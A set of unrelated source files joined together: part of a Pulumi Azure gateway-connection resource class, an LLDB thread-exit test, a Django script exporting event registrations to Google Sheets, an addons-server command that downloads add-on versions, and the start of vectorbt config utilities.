express_route_gateway_bypass: Optional[pulumi.Input[bool]] = None,
id: Optional[pulumi.Input[str]] = None,
ipsec_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['IpsecPolicyArgs']]]]] = None,
local_network_gateway2: Optional[pulumi.Input[pulumi.InputType['LocalNetworkGatewayArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
peer: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
routing_weight: Optional[pulumi.Input[int]] = None,
shared_key: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
traffic_selector_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TrafficSelectorPolicyArgs']]]]] = None,
use_local_azure_ip_address: Optional[pulumi.Input[bool]] = None,
use_policy_based_traffic_selectors: Optional[pulumi.Input[bool]] = None,
virtual_network_gateway1: Optional[pulumi.Input[pulumi.InputType['VirtualNetworkGatewayArgs']]] = None,
virtual_network_gateway2: Optional[pulumi.Input[pulumi.InputType['VirtualNetworkGatewayArgs']]] = None,
virtual_network_gateway_connection_name: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
A common class for general resource information.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] authorization_key: The authorizationKey.
:param pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']] connection_protocol: Connection protocol used for this connection.
:param pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionType']] connection_type: Gateway connection type.
:param pulumi.Input[int] dpd_timeout_seconds: The dead peer detection timeout of this connection in seconds.
:param pulumi.Input[bool] enable_bgp: EnableBgp flag.
:param pulumi.Input[bool] express_route_gateway_bypass: Bypass ExpressRoute Gateway for data forwarding.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['IpsecPolicyArgs']]]] ipsec_policies: The IPSec Policies to be considered by this connection.
:param pulumi.Input[pulumi.InputType['LocalNetworkGatewayArgs']] local_network_gateway2: The reference to local network gateway resource.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[pulumi.InputType['SubResourceArgs']] peer: The reference to peerings resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[int] routing_weight: The routing weight.
:param pulumi.Input[str] shared_key: The IPSec shared key.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TrafficSelectorPolicyArgs']]]] traffic_selector_policies: The Traffic Selector Policies to be considered by this connection.
:param pulumi.Input[bool] use_local_azure_ip_address: Use private local Azure IP for the connection.
:param pulumi.Input[bool] use_policy_based_traffic_selectors: Enable policy-based traffic selectors.
:param pulumi.Input[pulumi.InputType['VirtualNetworkGatewayArgs']] virtual_network_gateway1: The reference to virtual network gateway resource.
:param pulumi.Input[pulumi.InputType['VirtualNetworkGatewayArgs']] virtual_network_gateway2: The reference to virtual network gateway resource.
:param pulumi.Input[str] virtual_network_gateway_connection_name: The name of the virtual network gateway connection.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['authorization_key'] = authorization_key
__props__['connection_protocol'] = connection_protocol
if connection_type is None and not opts.urn:
raise TypeError("Missing required property 'connection_type'")
__props__['connection_type'] = connection_type
__props__['dpd_timeout_seconds'] = dpd_timeout_seconds
__props__['enable_bgp'] = enable_bgp
__props__['express_route_gateway_bypass'] = express_route_gateway_bypass
__props__['id'] = id
__props__['ipsec_policies'] = ipsec_policies
__props__['local_network_gateway2'] = local_network_gateway2
__props__['location'] = location
__props__['peer'] = peer
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['routing_weight'] = routing_weight
__props__['shared_key'] = shared_key
__props__['tags'] = tags
__props__['traffic_selector_policies'] = traffic_selector_policies
__props__['use_local_azure_ip_address'] = use_local_azure_ip_address
__props__['use_policy_based_traffic_selectors'] = use_policy_based_traffic_selectors
if virtual_network_gateway1 is None and not opts.urn:
raise TypeError("Missing required property 'virtual_network_gateway1'")
__props__['virtual_network_gateway1'] = virtual_network_gateway1
__props__['virtual_network_gateway2'] = virtual_network_gateway2
__props__['virtual_network_gateway_connection_name'] = virtual_network_gateway_connection_name
__props__['connection_status'] = None
__props__['egress_bytes_transferred'] = None
__props__['etag'] = None
__props__['ingress_bytes_transferred'] = None
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['resource_guid'] = None
__props__['tunnel_connection_status'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20200501:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/latest:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/latest:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20150615:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20150615:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20160330:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20160330:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20160601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20160601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20160901:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20160901:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20161201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20161201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20170301:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20170301:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20170601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20170601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20170801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20170801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20170901:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20170901:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20171001:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20171001:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20171101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20171101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20180101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20180201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20180401:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180401:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20180601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20180701:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180701:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20180801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20181001:VirtualNetworkGatewayConnection"), 
pulumi.Alias(type_="azure-nextgen:network/v20181001:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20181101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20181101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20181201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20181201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20190201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20190401:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190401:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20190601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20190701:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190701:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20190801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20190901:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190901:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20191101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20191101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20191201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20191201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20200301:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200301:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20200401:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200401:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20200601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20200701:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200701:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20200801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200801:VirtualNetworkGatewayConnection")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VirtualNetworkGatewayConnection, __self__).__init__(
'azure-native:network/v20200501:VirtualNetworkGatewayConnection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VirtualNetworkGatewayConnection':
"""
Get an existing VirtualNetworkGatewayConnection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["authorization_key"] = None
__props__["connection_protocol"] = None
__props__["connection_status"] = None
__props__["connection_type"] = None
__props__["dpd_timeout_seconds"] = None
__props__["egress_bytes_transferred"] = None
__props__["enable_bgp"] = None
__props__["etag"] = None
__props__["express_route_gateway_bypass"] = None
__props__["ingress_bytes_transferred"] = None
__props__["ipsec_policies"] = None
__props__["local_network_gateway2"] = None
__props__["location"] = None
__props__["name"] = None
__props__["peer"] = None
__props__["provisioning_state"] = None
__props__["resource_guid"] = None
__props__["routing_weight"] = None
__props__["shared_key"] = None
__props__["tags"] = None
__props__["traffic_selector_policies"] = None
__props__["tunnel_connection_status"] = None
__props__["type"] = None
__props__["use_local_azure_ip_address"] = None
__props__["use_policy_based_traffic_selectors"] = None
__props__["virtual_network_gateway1"] = None
__props__["virtual_network_gateway2"] = None
return VirtualNetworkGatewayConnection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="authorizationKey")
def authorization_key(self) -> pulumi.Output[Optional[str]]:
"""
The authorizationKey.
"""
return pulumi.get(self, "authorization_key")
@property
@pulumi.getter(name="connectionProtocol")
def connection_protocol(self) -> pulumi.Output[Optional[str]]:
"""
Connection protocol used for this connection.
"""
return pulumi.get(self, "connection_protocol")
@property
@pulumi.getter(name="connectionStatus")
def connection_status(self) -> pulumi.Output[str]:
"""
Virtual Network Gateway connection status.
"""
return pulumi.get(self, "connection_status")
@property
@pulumi.getter(name="connectionType")
def connection_type(self) -> pulumi.Output[str]:
"""
Gateway connection type.
"""
return pulumi.get(self, "connection_type")
@property
@pulumi.getter(name="dpdTimeoutSeconds")
def dpd_timeout_seconds(self) -> pulumi.Output[Optional[int]]:
"""
The dead peer detection timeout of this connection in seconds.
"""
return pulumi.get(self, "dpd_timeout_seconds")
@property
@pulumi.getter(name="egressBytesTransferred")
def egress_bytes_transferred(self) -> pulumi.Output[float]:
"""
The egress bytes transferred in this connection.
"""
return pulumi.get(self, "egress_bytes_transferred")
@property
@pulumi.getter(name="enableBgp")
def enable_bgp(self) -> pulumi.Output[Optional[bool]]:
"""
EnableBgp flag.
"""
return pulumi.get(self, "enable_bgp")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="expressRouteGatewayBypass")
def express_route_gateway_bypass(self) -> pulumi.Output[Optional[bool]]:
"""
Bypass ExpressRoute Gateway for data forwarding.
"""
return pulumi.get(self, "express_route_gateway_bypass")
@property
@pulumi.getter(name="ingressBytesTransferred")
def ingress_bytes_transferred(self) -> pulumi.Output[float]:
"""
The ingress bytes transferred in this connection.
"""
return pulumi.get(self, "ingress_bytes_transferred")
@property
@pulumi.getter(name="ipsecPolicies")
def ipsec_policies(self) -> pulumi.Output[Optional[Sequence['outputs.IpsecPolicyResponse']]]:
"""
The IPSec Policies to be considered by this connection.
"""
return pulumi.get(self, "ipsec_policies")
@property
@pulumi.getter(name="localNetworkGateway2")
def local_network_gateway2(self) -> pulumi.Output[Optional['outputs.LocalNetworkGatewayResponse']]:
"""
The reference to local network gateway resource.
"""
return pulumi.get(self, "local_network_gateway2")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def peer(self) -> pulumi.Output[Optional['outputs.SubResourceResponse']]:
"""
The reference to peerings resource.
"""
return pulumi.get(self, "peer")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the virtual network gateway connection resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> pulumi.Output[str]:
"""
The resource GUID property of the virtual network gateway connection resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter(name="routingWeight")
def routing_weight(self) -> pulumi.Output[Optional[int]]:
"""
The routing weight.
"""
return pulumi.get(self, "routing_weight")
@property
@pulumi.getter(name="sharedKey")
def shared_key(self) -> pulumi.Output[Optional[str]]:
"""
The IPSec shared key.
"""
return pulumi.get(self, "shared_key")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="trafficSelectorPolicies")
def traffic_selector_policies(self) -> pulumi.Output[Optional[Sequence['outputs.TrafficSelectorPolicyResponse']]]:
"""
The Traffic Selector Policies to be considered by this connection.
"""
return pulumi.get(self, "traffic_selector_policies")
@property
@pulumi.getter(name="tunnelConnectionStatus")
def tunnel_connection_status(self) -> pulumi.Output[Sequence['outputs.TunnelConnectionHealthResponse']]:
"""
Collection of all tunnels' connection health status.
"""
return pulumi.get(self, "tunnel_connection_status")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="useLocalAzureIpAddress")
def use_local_azure_ip_address(self) -> pulumi.Output[Optional[bool]]:
"""
Use private local Azure IP for the connection.
"""
return pulumi.get(self, "use_local_azure_ip_address")
@property
@pulumi.getter(name="usePolicyBasedTrafficSelectors")
def use_policy_based_traffic_selectors(self) -> pulumi.Output[Optional[bool]]:
"""
Enable policy-based traffic selectors.
"""
return pulumi.get(self, "use_policy_based_traffic_selectors")
@property
@pulumi.getter(name="virtualNetworkGateway1")
def virtual_network_gateway1(self) -> pulumi.Output['outputs.VirtualNetworkGatewayResponse']:
"""
The reference to virtual network gateway resource.
"""
return pulumi.get(self, "virtual_network_gateway1")
@property
@pulumi.getter(name="virtualNetworkGateway2")
def virtual_network_gateway2(self) -> pulumi.Output[Optional['outputs.VirtualNetworkGatewayResponse']]:
"""
The reference to virtual network gateway resource.
"""
return pulumi.get(self, "virtual_network_gateway2")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
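# Hypothetical usage sketch (names and gateway references are placeholders; per
# __init__ above, connection_type, resource_group_name and
# virtual_network_gateway1 are required unless opts.urn is set):
# conn = VirtualNetworkGatewayConnection(
#     "example-connection",
#     resource_group_name="example-rg",
#     connection_type="IPsec",
#     virtual_network_gateway1=existing_gateway_args,
#     local_network_gateway2=existing_local_gateway_args,
#     shared_key="example-key")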
|
"""
Make sure that we handle an expression on a thread, if
the thread exits while the expression is running.
"""
import lldb
from lldbsuite.test.decorators import *
import lldbsuite.test.lldbutil as lldbutil
from lldbsuite.test.lldbtest import *
class TestExitDuringExpression(TestBase):
mydir = TestBase.compute_mydir(__file__)
NO_DEBUG_INFO_TESTCASE = True
@skipIfWindows
@skipIf(oslist=["linux"], archs=["arm", "aarch64"], bugnumber="llvm.org/pr48414")
@expectedFailureAll(oslist=["freebsd"], bugnumber="llvm.org/pr48414")
@expectedFailureNetBSD
def test_exit_before_one_thread_unwind(self):
"""Test the case where we exit within the one thread timeout"""
self.exiting_expression_test(True, True)
@skipIfWindows
@skipIf(oslist=["linux"], archs=["arm", "aarch64"], bugnumber="llvm.org/pr48414")
@expectedFailureAll(oslist=["freebsd"], bugnumber="llvm.org/pr48414")
@expectedFailureNetBSD
def test_exit_before_one_thread_no_unwind(self):
"""Test the case where we exit within the one thread timeout"""
self.exiting_expression_test(True, False)
@skipIfWindows
def test_exit_after_one_thread_unwind(self):
"""Test the case where we exit within the one thread timeout"""
self.exiting_expression_test(False, True)
@skipIfWindows
def test_exit_after_one_thread_no_unwind(self):
"""Test the case where we exit within the one thread timeout"""
self.exiting_expression_test(False, False)
def setUp(self):
TestBase.setUp(self)
self.main_source_file = lldb.SBFileSpec("main.c")
self.build()
    def exiting_expression_test(self, before_one_thread_timeout, unwind):
        """function_to_call sleeps for g_timeout microseconds, then calls pthread_exit.
        This test calls function_to_call with an overall timeout of four times
        g_timeout, and a one_thread_timeout as passed in.
        It also sets unwind_on_exit for the call to the unwind passed in.
        This allows you to have the thread exit either before or after the
        one-thread timeout expires."""
(target, process, thread, bkpt) = lldbutil.run_to_source_breakpoint(self,
"Break here and cause the thread to exit", self.main_source_file)
# We'll continue to this breakpoint after running our expression:
return_bkpt = target.BreakpointCreateBySourceRegex("Break here to make sure the thread exited", self.main_source_file)
frame = thread.frames[0]
tid = thread.GetThreadID()
# Find the timeout:
var_options = lldb.SBVariablesOptions()
var_options.SetIncludeArguments(False)
var_options.SetIncludeLocals(False)
var_options.SetIncludeStatics(True)
value_list = frame.GetVariables(var_options)
g_timeout = value_list.GetFirstValueByName("g_timeout")
self.assertTrue(g_timeout.IsValid(), "Found g_timeout")
error = lldb.SBError()
timeout_value = g_timeout.GetValueAsUnsigned(error)
self.assertSuccess(error, "Couldn't get timeout value")
one_thread_timeout = 0
        if before_one_thread_timeout:
one_thread_timeout = timeout_value * 2
else:
one_thread_timeout = int(timeout_value / 2)
options = lldb.SBExpressionOptions()
options.SetUnwindOnError(unwind)
options.SetOneThreadTimeoutInMicroSeconds(one_thread_timeout)
options.SetTimeoutInMicroSeconds(4 * timeout_value)
result = frame.EvaluateExpression("function_to_call()", options)
# Make sure the thread actually exited:
thread = process.GetThreadByID(tid)
self.assertFalse(thread.IsValid(), "The thread exited")
# Make sure the expression failed:
self.assertFalse(result.GetError().Success(), "Expression failed.")
# Make sure we can keep going:
threads = lldbutil.continue_to_breakpoint(process, return_bkpt)
if not threads:
self.fail("didn't get any threads back after continuing")
self.assertEqual(len(threads), 1, "One thread hit our breakpoint")
thread = threads[0]
frame = thread.frames[0]
        # Now get the return value; if we successfully caused the thread to
        # exit, it should be 10, not 20.
ret_val = frame.FindVariable("ret_val")
self.assertSuccess(ret_val.GetError(), "Found ret_val")
ret_val_value = ret_val.GetValueAsSigned(error)
self.assertSuccess(error, "Got ret_val's value")
self.assertEqual(ret_val_value, 10, "We put the right value in ret_val")
|
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "oschub.settings")
import django
django.setup()
import gspread
from google.oauth2 import service_account
from eventreg.models import EventUserData, Event
from accounts.models import MailList
import datetime
from decouple import config
import json
# Creates a spreadsheet and shares it with the given email addresses.
def createSpreadSheet(mailList, title="NewSpreadsheet"):
try:
global createdNewSpreadSheet
if not createdNewSpreadSheet:
sheet = service.create(title)
print("[$] SpreadSheet ID: " + str(sheet.id))
for index, emailid in enumerate(mailList):
                # Commented out because transferring ownership raised an API access error:
# if index == 0:
# sheet.share(emailid, perm_type="user", role="owner")
# else:
sheet.share(emailid, perm_type="user", role="writer", notify=True)
print("Shared sheet to " + emailid)
createdNewSpreadSheet = True
except gspread.exceptions.APIError as error:
print("API Error: Trying Again !!")
print(error)
createSpreadSheet(mailList, title) # If API error then try again
def createSheet(title="EventName", row=10000, col=25):
try:
global createdNewSpreadSheet
sheet = service.open("Events") # opens the file "Events"
print("[x] Found spreadsheet 'Events' ")
if createdNewSpreadSheet:
sheet.add_worksheet(title, rows=row, cols=col)
tmp = sheet.get_worksheet(0)
sheet.del_worksheet(tmp)
print(f"[!] Renamed default Sheet1 to {title}")
createdNewSpreadSheet = False
else:
sheet.add_worksheet(title, rows=row, cols=col)
print("[x] Added sheet - " + title)
worksheet = sheet.worksheet(title)
worksheet.append_row(["Reg No", "Name", "Email", "Registered", "Attended"])
worksheet.format(
"A1:E1", {"horizontalAlignment": "CENTER", "textFormat": {"bold": True}}
)
print(f"[x] Added Header data to the sheet {title}")
return worksheet
except gspread.exceptions.SpreadsheetNotFound:
print('[!] "Events" SpreadSheet not found, attempting to create a new one')
createSpreadSheet(admin_mail, "Events")
        return createSheet(title)
def getCompletedEvents():
# Filtering out the events that are over
events = Event.objects.all().filter(
eventDate__lt=datetime.date.today()
) # gets the events with date before today
eventlist = []
for event in events:
eventlist.append(event.eventName.replace(":", "|"))
events = Event.objects.filter(eventDate=datetime.date.today()).filter(
eventEndTime__lt=datetime.datetime.now().strftime("%H:%M:%S")
)
for event in events:
eventlist.append(event.eventName.replace(":", "|"))
return eventlist
def updateData():
admin_mail_latest = getAdminMail()
event_list = getCompletedEvents()
# If spreadsheet not found then make a new one
try:
sheet = service.open("Events")
except gspread.exceptions.SpreadsheetNotFound:
print('[!] "Events" SpreadSheet not found, attempting to create a new one')
createSpreadSheet(admin_mail, "Events")
sheet = service.open("Events")
    # Share the sheet again so that newly added admin emails also get access
for email_id in admin_mail_latest:
if email_id not in admin_mail:
sheet.share(email_id, perm_type="user", role="writer", notify=True)
print("Shared sheet to " + email_id)
# get all the available worksheets
worksheet = sheet.worksheets()
sheetList = []
for work in worksheet:
sheetList.append(work.title)
# getting user data for the events that are over
for event in event_list:
studentList = []
if event in sheetList:
print(f"[!] Skipping the Sheet, the worksheet {event} already exists !!")
else:
students = EventUserData.objects.filter(
eventName__eventName=event.replace("|", ":")
)
for student in students:
studentList.append(
[
student.studentReg,
student.studentName,
student.studentEmail,
"Yes" if student.studentRegistered else "No",
"Yes" if student.studentCheckedIn else "No",
]
)
worksheet = createSheet(event)
worksheet.batch_update(
[{"range": f"A2:E{len(studentList) + 1}", "values": studentList}]
)
print("[x] Added user data set to sheet " + event)
def getAdminMail():
admin_mail = []
mailList = MailList.objects.all()
for mail in mailList:
admin_mail.append(mail.email)
return admin_mail
def delAllSpreadsheet():
for spreadsheet in service.openall():
service.del_spreadsheet(spreadsheet.id)
print("deleted " + spreadsheet.title + " || " + spreadsheet.id)
# CAUTION: Transferring ownership is blocked by the API, so every email is given writer access (see createSpreadSheet).
createdNewSpreadSheet = False
admin_mail = getAdminMail()
SCOPE = [
"https://spreadsheets.google.com/feeds",
"https://www.googleapis.com/auth/spreadsheets",
"https://www.googleapis.com/auth/drive.file",
"https://www.googleapis.com/auth/drive",
]
credential_info = json.loads(config("CREDENTIALS"))
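# `CREDENTIALS` is expected to hold the service-account JSON on a single line,
# e.g. in .env (hypothetical): CREDENTIALS={"type": "service_account", ...}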
credential = service_account.Credentials.from_service_account_info(
credential_info, scopes=SCOPE
)
service = gspread.authorize(credential)
if __name__ == "__main__":
# Use the following method to update data to the google spreadsheet
updateData()
# Use the following method to delete all the existing spreadsheets of the bot account
# delAllSpreadsheet()
|
import requests
from os.path import basename
from urllib.parse import urlparse
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.management.base import BaseCommand, CommandError
from django.db.transaction import atomic
from olympia import amo
from olympia.amo.tests import version_factory
from olympia.addons.models import Addon
class KeyboardInterruptError(Exception):
pass
class Command(BaseCommand):
"""Download versions for a particular add-on from AMO public data."""
VERSIONS_API_URL = (
'https://addons.mozilla.org/api/v4/addons/addon/%(slug)s/versions/'
)
def add_arguments(self, parser):
parser.add_argument('slug', type=str)
def handle(self, *args, **options):
if not settings.DEBUG:
raise CommandError(
'As a safety precaution this command only works if DEBUG=True.'
)
self.fetch_versions_data(**options)
def get_max_pages(self, slug):
response = requests.get(self.VERSIONS_API_URL % {'slug': slug})
return response.json()['page_count']
def fetch_versions_data(self, **options):
self.addon = Addon.objects.get(slug=options['slug'])
slug = self.addon.slug
pages = range(1, self.get_max_pages(slug) + 1)
print('Fetching pages from 1 to %s' % max(pages))
for page in pages:
self._get_versions_from_page(slug, page)
def _get_versions_from_page(self, slug, page):
data = []
print('fetching %s' % page)
query_params = {'page': page}
response = requests.get(
self.VERSIONS_API_URL % {'slug': slug}, params=query_params
)
print('fetched %s' % page)
for version in response.json()['results']:
self._handle_version(version)
return data
def _download_file(self, url, file_):
with storage.open(file_.current_file_path, 'wb') as f:
data = requests.get(url)
f.write(data.content)
def _handle_version(self, data):
if (
self.addon.versions(manager='unfiltered_for_relations')
.filter(version=data['version'])
.exists()
):
            print('Skipping %s (version already exists)' % data['version'])
return
files_data = data['files'][0]
file_kw = {
'hash': files_data['hash'],
'filename': basename(urlparse(files_data['url']).path),
'status': amo.STATUS_CHOICES_API_LOOKUP[files_data['status']],
'platform': amo.PLATFORM_DICT[files_data['platform']].id,
'size': files_data['size'],
'is_webextension': files_data['is_webextension'],
'is_mozilla_signed_extension': (files_data['is_mozilla_signed_extension']),
'strict_compatibility': (data['is_strict_compatibility_enabled']),
}
version_kw = {
'version': data['version'],
# FIXME: maybe reviewed/created would make sense at least, to
# get more or less the correct ordering ?
# Everything else we don't really care about at the moment.
}
print('Creating version %s' % data['version'])
with atomic():
version = version_factory(addon=self.addon, file_kw=file_kw, **version_kw)
# Download the file to the right path.
print('Downloading file for version %s' % data['version'])
self._download_file(files_data['url'], version.files.all()[0])
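# Hypothetical invocation (the actual command name comes from this module's
# file name, which is not shown here):
#   ./manage.py <command_name> some-addon-slug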
|
"""Utilities for configuration."""
from copy import copy, deepcopy
from collections import namedtuple
import dill
import inspect
from vectorbt import _typing as tp
from vectorbt.utils import checks
from vectorbt.utils.attr import deep_getattr
def resolve_dict(dct: tp.DictLikeSequence, i: tp.Optional[int] = None) -> dict:
"""Select keyword arguments."""
if dct is None:
dct = {}
if isinstance(dct, dict):
return dict(dct)
if i is not None:
_dct = dct[i]
if _dct is None:
_dct = {}
return dict(_dct)
raise ValueError("Cannot resolve dict")
def get_func_kwargs(func: tp.Callable) -> dict:
"""Get keyword arguments with defaults of a function."""
signature = inspect.signature(func)
return {
k: v.default
for k, v in signature.parameters.items()
if v.default is not inspect.Parameter.empty
}
def get_func_arg_names(func: tp.Callable) -> tp.List[str]:
"""Get argument names of a function."""
signature = inspect.signature(func)
return [
p.name for p in signature.parameters.values()
if p.kind != p.VAR_POSITIONAL and p.kind != p.VAR_KEYWORD
]
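# Examples (illustrative):
# get_func_kwargs(lambda a, b=2: None)                  -> {'b': 2}
# get_func_arg_names(lambda a, *args, b=2, **kw: None)  -> ['a', 'b']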
class atomic_dict(dict):
